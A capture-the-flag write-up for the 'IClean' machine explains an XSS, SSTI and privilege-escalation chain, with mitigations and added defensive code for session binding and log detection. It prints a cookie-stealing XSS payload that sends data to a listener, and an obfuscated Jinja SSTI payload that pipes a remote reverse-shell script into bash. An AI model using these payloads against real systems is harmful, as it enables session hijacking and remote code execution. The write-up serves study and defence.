IClean is a challenge that starts with identifying vulnerabilities in a Flask web application. First, an XSS vulnerability is exploited to obtain a session cookie, which is then used to bypass authentication and access the dashboard page. Next, a server-side template injection (SSTI) vulnerability on the dashboard page is exploited to gain remote code execution (RCE). Hardcoded credentials in a Python script allow for dumping hashes from a database, and one of the hashes is cracked, enabling lateral movement to a standard user account. This user has sudo privileges over a binary, which is exploited to extract the root user's private SSH key, ultimately achieving privilege escalation.
Tools used:
- nmap
- Burp Suite
- Meyerweb.com
- crackstation.net
Cross-Site Scripting (XSS) is a type of vulnerability that allows a threat actor to inject a malicious payload into content viewed by other users. When the content is viewed, the payload executes in the victim's browser, leading to potential breaches such as:
- Data theft
- Session hijacking
- Other types of security breaches
Session hijacking: exploiting a session by stealing or predicting a valid session token. The stolen or predicted token can be used to:
- Bypass authentication mechanisms
- Steal data
Mitigation
- Use HTTPS: ensure all communication between the client and server is encrypted using HTTPS to prevent session hijacking via network sniffing.
- User-Agent and IP binding: to prevent session hijacking, bind the session to the user's IP address and User-Agent string.
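The following is an added example, not code from the challenge or the original writeup. It is a minimal, stdlib-only server-side session store that applies the binding mitigation above: tokens are unguessable, each session is tied to an HMAC fingerprint of the client's IP address and User-Agent taken at login, and a token presented from a different client is treated as stolen and revoked. The `Session`, `SessionStore` and `set_cookie_header` names, the TTL and the sample client values are all assumptions made for this example.

```python
import hashlib
import hmac
import secrets
import time
from dataclasses import dataclass, field
from typing import Dict, Optional

# Added example (not the challenge's code): a server-side session store that binds each
# session to the client's IP address and User-Agent and revokes tokens seen elsewhere.


@dataclass
class Session:
    user: str
    fingerprint: str                      # HMAC(ip, user_agent) computed at login
    created: float = field(default_factory=time.time)


class SessionStore:
    def __init__(self, server_key: bytes, ttl_seconds: int = 3600):
        self._key = server_key            # secret, so a fingerprint cannot be forged offline
        self._ttl = ttl_seconds
        self._sessions: Dict[str, Session] = {}

    def _fingerprint(self, ip: str, user_agent: str) -> str:
        msg = f"{ip}\x00{user_agent}".encode()
        return hmac.new(self._key, msg, hashlib.sha256).hexdigest()

    def create(self, user: str, ip: str, user_agent: str) -> str:
        """Issue a new 256-bit random token bound to this client."""
        token = secrets.token_urlsafe(32)
        self._sessions[token] = Session(user, self._fingerprint(ip, user_agent))
        return token

    def resolve(self, token: str, ip: str, user_agent: str) -> Optional[str]:
        """Return the user for a valid, unexpired token from the same client, else None."""
        session = self._sessions.get(token)
        if session is None:
            return None
        if time.time() - session.created > self._ttl:
            del self._sessions[token]
            return None
        expected = self._fingerprint(ip, user_agent)
        if not hmac.compare_digest(session.fingerprint, expected):
            # Same token, different client: consistent with a hijacked cookie.
            # Revoke it so the legitimate user has to log in again.
            del self._sessions[token]
            return None
        return session.user


def set_cookie_header(token: str) -> str:
    """Set-Cookie value for the session token. HttpOnly keeps the cookie out of
    document.cookie, Secure keeps it off plaintext HTTP, SameSite limits cross-site sends."""
    return f"session={token}; HttpOnly; Secure; SameSite=Lax; Path=/"


if __name__ == "__main__":
    store = SessionStore(server_key=secrets.token_bytes(32))
    token = store.create("alice", "10.0.0.5", "Mozilla/5.0")
    print(set_cookie_header(token))
    print(store.resolve(token, "10.0.0.5", "Mozilla/5.0"))   # alice
    print(store.resolve(token, "10.0.0.99", "Mozilla/5.0"))  # None: token revoked
```

Two caveats a practitioner would weigh: IP binding logs out users whose address changes (mobile networks, carrier NAT), and the User-Agent header is chosen by the client, so binding is defence in depth rather than a complete control. The cookie attributes in `set_cookie_header` matter at least as much here: with HttpOnly set, the `document.cookie` read in the XSS payload used in this challenge would return nothing, and short lifetimes limit how long a leaked token stays useful.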
Server-side Template Injection (SSTI) is a security vulnerability that arises when an attacker injects malicious code into a web application's templates. This occurs when the template engine doesn't properly separate template code from user-input data, causing the injected code to be executed as part of the template. This allows attackers to execute malicious payloads, potentially leading to severe security breaches.
Mitigation
- Input validation: validate and sanitise all user inputs to ensure they do not contain executable code.
- Use secure templates: choose template engines with built-in security features and avoid using insecure or outdated ones.
- Escape user inputs: always escape user inputs before including them in templates to prevent execution as code.
- Whitelist inputs: use a whitelist approach to limit the types of data that can be included in templates.
- Limit template functionality: restrict the capabilities of the template engine to minimise the risk of code execution.
- Separate data and code: to prevent mixing executable code with user inputs, ensure a clear separation between the template logic and user data.
- Security audits: regularly perform security audits and code reviews to identify and fix potential SSTI vulnerabilities.
- Keep dependencies updated: regularly update the template engine and other dependencies to the latest versions with security patches.
XSS payload used to exfiltrate the session cookie to a listener (<IP> and PORT are placeholders):
<img src=x onerror=fetch("http://<IP>:PORT/"+document.cookie);>
SSTI payload used on the dashboard page for remote code execution:
{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("curl IP:PORT/revshell | bash")|attr("read")()}}
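The following is an added example, not code from the challenge or the original writeup, covering the SSTI mitigation list and the two payloads above from the defender's side. It has three parts: a whitelist validator for a short form field, a renderer that only ever treats user input as an escaped value (never as template source, which is the "separate data and code" point), and a detector that scans access-log lines for the shapes of the payloads above: template delimiters, the `\x5f` hex escapes the SSTI payload uses in place of `__` (which is how it slips past a naive filter for double underscores), Jinja's `attr()` filter, and inline event-handler markup. The log lines, the `ATTACKER_IP:PORT` placeholder, the field whitelist and the function names are all constructed for this example.

```python
import html
import re
import urllib.parse
from typing import Dict, List

# Added example, not the challenge's code. Whitelist for a short free-text form field
# (letters, digits, spaces and a little punctuation); everything else is rejected.
ALLOWED_VALUE = re.compile(r"^[A-Za-z0-9 ,.'-]{1,64}$")

# Request-level indicators, constructed for this example:
#  - Jinja/Flask template delimiters
#  - "\x5f" hex escapes or literal "__" (dunder access) and Jinja's attr() filter
#  - inline HTML event handlers or script tags
TEMPLATE_DELIMS = re.compile(r"\{\{|\}\}|\{%|%\}|\{#")
DUNDER_OBFUSCATION = re.compile(r"\\x5f|__|\|\s*attr\s*\(", re.IGNORECASE)
XSS_MARKUP = re.compile(r"\bon[a-z]+\s*=|<script", re.IGNORECASE)


def validate_input(value: str) -> bool:
    """Whitelist check for a plain-text form field."""
    return ALLOWED_VALUE.match(value) is not None


def safe_render(template: str, **values: str) -> str:
    """Render a developer-controlled template with HTML-escaped values. User data enters
    only as a value, so template syntax inside it is output literally, never evaluated."""
    escaped = {k: html.escape(str(v), quote=True) for k, v in values.items()}
    return template.format(**escaped)


# Combined-format access log line, e.g. 1.2.3.4 - - [date] "GET /path HTTP/1.1" 200 512
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def flag_request(target: str) -> List[str]:
    """Return the indicator names that fire on a request target, after decoding twice
    so single- and double-URL-encoded payloads are both seen in the clear."""
    decoded = urllib.parse.unquote_plus(urllib.parse.unquote_plus(target))
    reasons = []
    if TEMPLATE_DELIMS.search(decoded):
        reasons.append("template-delimiters")
    if DUNDER_OBFUSCATION.search(decoded):
        reasons.append("dunder-obfuscation")
    if XSS_MARKUP.search(decoded):
        reasons.append("xss-markup")
    return reasons


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Parse access-log lines and return the suspicious ones with their indicators."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        reasons = flag_request(m["target"])
        if reasons:
            hits.append({"ip": m["ip"], "target": m["target"], "reasons": reasons})
    return hits


# Constructed sample: one benign request, one SSTI probe shaped like the payload above
# (URL-encoded, with \x5f escapes), and one XSS probe shaped like the cookie-stealing
# payload above, with ATTACKER_IP:PORT placeholders instead of a real listener address.
SAMPLE_LOG = [
    '10.10.14.2 - - [01/Jan/2024:12:00:00 +0000] "GET /dashboard?q=invoice HTTP/1.1" 200 512',
    '10.10.14.2 - - [01/Jan/2024:12:00:05 +0000] "POST /dashboard?q=%7B%7Brequest%7Cattr(%22application%22)%7Cattr(%22%5Cx5f%5Cx5fglobals%5Cx5f%5Cx5f%22)%7D%7D HTTP/1.1" 200 512',
    '10.10.14.2 - - [01/Jan/2024:12:00:09 +0000] "GET /quote?service=%3Cimg+src%3Dx+onerror%3Dfetch(%22http%3A%2F%2FATTACKER_IP%3APORT%2F%22%2Bdocument.cookie)%3E HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    print(safe_render("<p>Hello {name}</p>", name="{{7*7}}"))   # braces printed, not evaluated
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["reasons"], hit["target"])
```

The renderer is deliberately not a template engine: `str.format` is given a fixed template and only escaped values, so a value of `{{7*7}}` comes out as the literal text rather than `49`. The detector is a triage aid, not a block list; in the challenge's setting the same indicators would apply whether the probe arrives in a query string, a form body or a header, so a production version would feed all three through `flag_request`.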